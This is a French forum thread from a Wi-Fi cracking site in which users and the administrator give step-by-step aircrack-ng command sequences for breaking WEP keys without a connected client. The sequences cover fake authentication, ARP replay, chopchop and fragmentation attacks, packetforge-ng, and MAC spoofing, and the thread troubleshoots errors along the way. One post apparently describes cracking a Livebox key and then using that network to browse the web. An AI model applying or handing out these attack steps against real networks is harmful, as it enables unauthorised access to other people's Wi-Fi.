Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 27-05-2008 09:27:06

Michwii
N00b
Inscription : 27-05-2008
Messages : 3

Comment hacker une clée WEP ou WPA sans station ?

Voila tout est dans le titre.
Je n'est qu'un seul ordinateur chez moi et donc lorsque j'essaye de cracker ma clée wpa il ne trouve pas de station. Y'aurai t'il un moyen de la cracker sans station?
J'ai entendu parler de l'attaque ChopChop ou par Fragmentation.
Qu'en penser vous?
Le soucis c'est que je les est dejà essayer sans aucun succes. Il n'arrive pas a trouver de frame (si c'est comme sa que sa s'appelle). Aireplay-ng lis sans aucun resultat les paquets.

Reads 1503 paquest

Merci d'avance.
Cordialement Michwii.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 27-05-2008 12:51:29

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

Je t'invite à faire une petite recherche sur le forum, et parcourir les différents posts. Ce sujet a déja été traité.

Pour le crack WPA, il est impossible de capturer un handshake sans station connectée, regarde ce topic, tu trouveras les réponses à tes questions. Je te suggère aussi de lire et relire le Tuto sur le crack WPA afin de bien t'en imprégner, et comprendre toutes les étapes.

Concernant le crack WEP, il est possible dans certains cas de réussir le crack sans station connectée en effectuant une attaque de type chopchop (aireplay-ng -4), c'est expliqué dans ce topic. Cela dit, l'attaque chopchop ne fonctionne pas dans tous les cas, et le mieux pour tester ton réseau est bien sur d'avoir une station connectée, si tu t'intéresse au wifi et aux tests de sécurité sur ton réseau, investis dans une bonne carte wifi (l'Alfa 500 est LA carte idéale wink ) et tu pourras te lancer dans de bonnes conditions.

Hors Ligne

#3 27-05-2008 13:05:18

noob
Membre Indétronable
Inscription : 12-05-2008
Messages : 178

Re : Comment hacker une clée WEP ou WPA sans station ?

Pas besoin de chopchop pour les freeboxs smile

aireplay -1 30
aireplay -3 Direct sur la fake station et tu vas voir que les arp vont monter même sans vrai station smile


Après tu peux aussi essayer wesside-ng qui est dans BT3 beta
J'avais aucun client sur mon réseau et en 25 seconde j'ai trouvé ma clé 64bits smile

Tu as aussi les attaques chopchop et fragmentation

Dernière modification par noob (27-05-2008 13:05:49)

Hors Ligne

#4 07-07-2008 12:06:24

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

Salut Noob ^^

est-ce que tu pourrais developper un peu plus ta methode:

aireplay -1 30
aireplay -3 Direct sur la fake station et tu vas voir que les arp vont monter même sans vrai station smile

STP merci

Hors Ligne

#5 07-07-2008 22:33:47

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

Salut themacke59, content de te revoir sur le forum wink

Je me permet de répondre car noob est actuellement en vacances, et il n'a pas internet le pauvre hmm On compatit en attendant son retour.

Je n'ai pas testé cette méthode sur les freebox, mais je pense comprendre de quoi il s'agit. Petite explication:

Tout d'abord, tu lance airodump-ng dans un premier shell.

Tu ouvre un 2ème shell, et:

aireplay-ng wlan0 -1 30 -e "essid" -a "mac ap" -h "mac station"

Cette commande permet de te faire passer pour un client auprès du point d'accès, en s'associant à intervalles réguliers (ici l'intervalle sera 30, donc toutes les 30 secondes); tu apparais alors toi meme dans airodump-ng comme station... Si le filtrage mac est désactivé, ou si tu as spoofé une adresse mac de station autorisée.

Maintenant tu lance un 3ème shell, avec une attaque aireplay-ng -3 (rejeu d'arp)

aireplay-ng -3 -e "essid" -a "mac ap" -b "mac ap" -h "mac station" -x600 -r ton-fichier-de-capture.cap wlan0

Et si les ARP décollent, tu n'a plus qu'à attendre un peu et lancer aircrack-ng.

Voila pour la petite explication. Je te laisse tester cela et nous dire ce que ça donne, n'oublie pas que pour cracker du WEP sans client connecté il y a l'attaque CHOPCHOP (aireplay-ng -4) qui donne de très bons résultats, et sur le meme schéma l'attaque par fragmentation (aireplay-ng -5).

Hors Ligne

#6 08-07-2008 11:51:40

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

Salut ! Merci pour la reponse ! mais un petit truc m'embete, pour dans le 3eme shell ecrire deux fois l'adresse 'mac ap' ???

Hors Ligne

#7 08-07-2008 12:36:51

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

Je ne vois pas pourquoi ça t'embete... Fais moi confiance, fais le test, et tu verras que cette commande fonctionne parfaitement wink

Hors Ligne

#8 08-07-2008 12:48:25

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

euuuh desolé je mets pas ta parole en doute mais jai un soucis, une fois il me dis un truc du genre no such file in directory et apres invalid wep filter quelque chose, c'est au niveau de la derniere commande (shell 3)

voila merci ++

Hors Ligne

#9 08-07-2008 13:01:52

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

"no such file in directory": aireplay-ng ne trouve pas ton fichier de capture. Tu as rentré un nom de fichier erroné ou bien tu n'as pas lancé la commande depuis le bon dossier (celui dans lequel se trouve ton fichier de capture).

"invalid wep filter": ça ne me dit rien... Donne nous plus de détails, envoie nous la commande que tu lance et le message d'erreur qui s'affiche en retour s'il te plait, ça nous permettra de t'aider au mieux.

Hors Ligne

#10 08-07-2008 13:50:35

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

ok ok, je vais retester apres sinon voila la ligne de commande que je rentre:

aireplay-ng -3 -e freebox -a 92:C4:D8:8A:31:94 -b 92:C4:D8:8A:31:94 -h 00:1B:77:9F:CF:CB -x600 -r /root/test.cap wifi0

Dernière modification par themacke59 (08-07-2008 13:51:28)

Hors Ligne

#11 09-07-2008 11:46:04

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

RE-bonjour ^^

ba ecouté jai beau tourner la ligne de commande dans tous les sens, hé ben toujours pareil: no such file ....

Hors Ligne

#12 09-07-2008 12:37:14

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

Pour simplifier, donne moi toutes les commandes que tu rentre dans les 3 shells, je te dirais si je vois une erreur quelque part. Es tu bien sur d'avoir utilisé l'argument -w dans airodump-ng pour créer un fichier de capture? Connais tu le nom du fichier de capture? Sais tu que airodump-ng rajoute -01 -02 -03 etc... aux noms des fichiers de capture?

Je te conseille de te placer dans le dossier contenant le fichier de capture avant de lancer la commande aireplay-ng -3

cd /root

La commande dir t'indique le nom des fichiers contenus dans un dossier.

Avec airodump-ng, ton fichier de capture devrait s'appeler test-01.cap à mon avis wink

Hors Ligne

#13 09-07-2008 14:06:28

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

Voila le detail de mes commande ^^

1er Shell -->

modprobe -r iwl3945
cd /usr/src/drivers/ipwraw-ng/
make
make install
modprobe ipwraw
ifconfig wifi0 up
airodump-ng wifi0

2eme Shell -->

aireplay-ng wifi0 -1 30 -e essid -a bssid -h @mac (fake macchanger)

3eme Shell -->

aireplay-ng -3 -e essid -a bssid -b bssid -h @mac (fake macchanger) -x600 -r /root/test.cap wifi0

Voila alors maintenant je sais pas ce qui bloque ^^
MERCI ++

Hors Ligne

#14 09-07-2008 19:04:30

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

Je vais te le dire ce qui bloque:

airodump-ng wifi0

Cette commande lance le scan, mais tu ne crée pas un fichier de capture. Dans ton 3ème shell, tu utilise le nom de fichier test.cap... Tu le sors d'ou ce nom? Et pourquoi demande tu à aireplay d'aller chercher le fichier test.cap dans /root, alors que tu n'as meme pas créé ce fichier?

On reprend. Voici ce que tu dois faire:

1er Shell -->

modprobe -r iwl3945
cd /usr/src/drivers/ipwraw-ng/
make
make install
modprobe ipwraw
ifconfig wifi0 up
cd /root/Desktop
airodump-ng -w test --encrypt wep wifi0

2eme Shell -->

cd /root/Desktop
aireplay-ng wifi0 -1 30 -e essid -a bssid -h @mac (fake macchanger)

3eme Shell -->

cd /root/Desktop
aireplay-ng -3 -e essid -a bssid -b bssid -h @mac (fake macchanger) -x600 -r test-01.cap wifi0

Ca devrait nettement mieux fonctionner (dans la mesure ou tes commandes de passage en mode monitor sont ok). Avec les commandes que je te donne, le fichier de capture sera créé sur le bureau. Pense aussi à utiliser le filtre -c channel pour cibler un canal bien précis, les performances sont moins bonnes lorsque la carte est en channel hopping wink

Tape simplement airodump-ng dans le shell, tu verras quelques renseignements de base qui te permettront de mieux comprendre comment airodump-ng fonctionne.

Hors Ligne

#15 10-07-2008 11:49:59

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

Haaa !!! ca fait plaisir ! je test de suite ^^ je te tiens au courant ^^

Hors Ligne

#16 10-07-2008 13:24:57

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

RE ^^ bon ba pas de chance ! seulement 6ivs et plus rien en 1h30, mais c'est ça que j'ai pas compris, j'ai fait 6ivs en 2/3minutes même pas et apres plus rien !

Hors Ligne

#17 10-07-2008 19:32:01

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

Comme tu débute, le mieux est que tu te lance dans le crack de clé WEP avec station connectée tout d'abord. Une fois que tu maitrisera bien cela, tu pourras te lancer dans le crack de réseau WEP sans client. Il faut savoir que le crack sans client ne réussit pas toujours, ne t'en fais pas, continue à apprendre wink

Hors Ligne

#18 10-07-2008 19:51:04

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

ok ok jtassure c'est vrai que sur le forum je suis debutant mais bon vos tutos m'on pas mal aidé et le crack wep avec station connectée il y a pas de soucis ^^ mais alors aucun ! Malheureusement c'est peut etre ma carte qui fait la gueule ! penses tu qu'avec la 'alfa 500' cela va mieu pour la methode sans station ?!

Hors Ligne

#19 10-07-2008 20:26:48

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

La réussite d'un crack WEP avec ou sans station dépend bien souvent de la qualité du signal radio ("rxq" sous airodump-ng). En effet, pour injecter (aireplay-ng) correctement, il est important que tu reçoive bien les paquets envoyés par l'AP, et que l'AP reçoive bien les paquets que tu envoie. Je te donne un exemple:

Avec un bon signal, l'association est immédiate, avec un mauvais signal l'association est longue et peut meme échouer. Avec un bon signal la vitesse d'injection (datas/s sous airodump-ng) est élevée, avec un mauvais signal ça rame vraiment. Le fait d'utiliser une bonne carte telle que l'alfa 500 mW highpower AWUS036H couplée à une bonne antenne permet d'améliorer la qualité du signal sur tous les réseaux environnants, et donc bien évidemment les résultats avec la suite aircrack-ng sont bien meilleurs puisque tu capte mieux et que tu peux envoyer des paquets plus fort et plus loin.

Il est impossible de dire qu'une meilleure carte va te permettre de réussir le crack de CETTE AP sans client, mais par contre avec une alfa 500 tu vas découvrir plein de nouveaux réseaux, et tu capteras beaucoup mieux ceux qui sont déja à ta portée, ça c'est sur. Prend le temps de lire ce topic qui te donnera toutes les informations à propos de l'alfa 500 wink

Hors Ligne

#20 15-07-2008 12:55:06

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

bonjour a tous !!!

alors voila j'ai testé l'attaque chopchop qui a faillit marcher mais voila j'obtient un message d'erreur

Probleme --> Saving chosen packet in replay_src-0714-112411.cap

Sent 14422 packets, current guess: 1D...

The chopchop attack appears to have failed. Possible reasons:

    * You're trying to inject with an unsupported chipset (Centrino?).
    * The driver source wasn't properly patched for injection support.
    * You are too far from the AP. Get closer or reduce the send rate.
    * Target is 802.11g only but you are using a Prism2 or RTL8180.
    * The wireless interface isn't setup on the correct channel.
    * The client MAC you have specified is not currently authenticated.
      Try running another aireplay-ng to fake authentication (attack "-1").
    * The AP isn't vulnerable when operating in authenticated mode.
      Try aireplay-ng in non-authenticated mode instead (no -h option).

voila mes lignes de commande

1er Shell -->

modprobe -r iwl3945
cd /usr/src/drivers/ipwraw-ng/
make
make install
modprobe ipwraw
ifconfig wifi0 up
airodump-ng --write /root/test --channel 13 --encrypt wep wifi0

2eme Shell -->

aireplay-ng wifi0 -1 30 -e essid -a bssid -h @mac (fake macchanger)

3eme Shell -->

aireplay-ng -4 -b bssid -h @mac(fake macchanger) wifi0
reperer le fichier .cap

4eme Shell -->

tcpdump -s 0 -n -e -r Fichier_Cap_Creer_Avant

5eme Shell -->

packetforge-ng -0 -a bssid -h @Mac (fake macchanger) -k Ip_Source -l Ip_Destination -y Fichier_Xor_Creer_Avant -w Nom_Fichier_Sortie

6eme Shell -->

aireplay -3 -e Essid -b Bssid -h Bssidn -x 600 -r Fichier_Cap_A_Utiliser(5eme Shell) wifi0

Dernière modification par themacke59 (15-07-2008 12:56:24)

Hors Ligne

#21 15-07-2008 13:27:11

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

Tu n'arrive pas à décrypter de paquet...

Regarde ce message, halbatar est dans le meme cas que toi...

La Chopchop ne fonctionne pas à tous les coups.

Hors Ligne

#22 15-07-2008 17:31:31

themacke59
Membre
Inscription : 28-04-2008
Messages : 20

Re : Comment hacker une clée WEP ou WPA sans station ?

re-bonjour apparament ce n'est pas specialement ma carte car jai testé avec mon bo-frere et sa ALFA 500, meme resultat !

Hors Ligne

#23 15-07-2008 21:33:08

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

Si le "rxq" (qualité du signal wifi) était bon, alors ce n'est pas en relançant les memes commandes avec une autre carte que cela changera quoi que ce soit... C'est énervant de rester sur un échec, mais dis toi bien une chose: certains points d'accès ne sont pas vulnérables à l'attaque Chopchop, tu feras mieux la prochaine fois wink

Hors Ligne

#24 15-07-2008 21:45:43

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Comment hacker une clée WEP ou WPA sans station ?

Pour info, hier j'ai cracké une clé wep d'une livebox sans station. J'avais récupéré 2 MAC valides d'abord à cause du filtrage MAC de base bien sur sur les livebox. Un petit macchanger pour commencer. C'était avec une attaque arp-replay (-3) par contre. Ensuite connexion impeccable avec la fake MAC toujours, et zou sur le web....


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#25 15-07-2008 21:51:08

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 5 988

Re : Comment hacker une clée WEP ou WPA sans station ?

Oui, en principe sur les Livebox la Chopchop fonctionne assez bien... Themake59, serait il possible que tu nous fasse des captures d'écrans de tes différents shells et que tu les affiche sur le forum? Ca nous permettra de bien voir ce que tu fais, et peut etre qu'on verra une erreur qui t'aurait échappé quelque part...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Les vidéos Crack-wifi.com: crack WEP, crack WPA, rogue AP, Airolib-ng, Pentest...


Loading...

Les vidéos de Syfer: Backtrack 4 R1, Metasploit, SSLStrip, SET, Compiz...


Loading2...

Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Abix, informatique   |    Misco, informatique   |    Kelkoo   |   
|   Pixmania   |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 500 Go   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.157 seconds, 12 queries executed ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]

Global Stats - [ Visitors : 6961272   Today : 3283   Online (Site + Forum) : 40 ]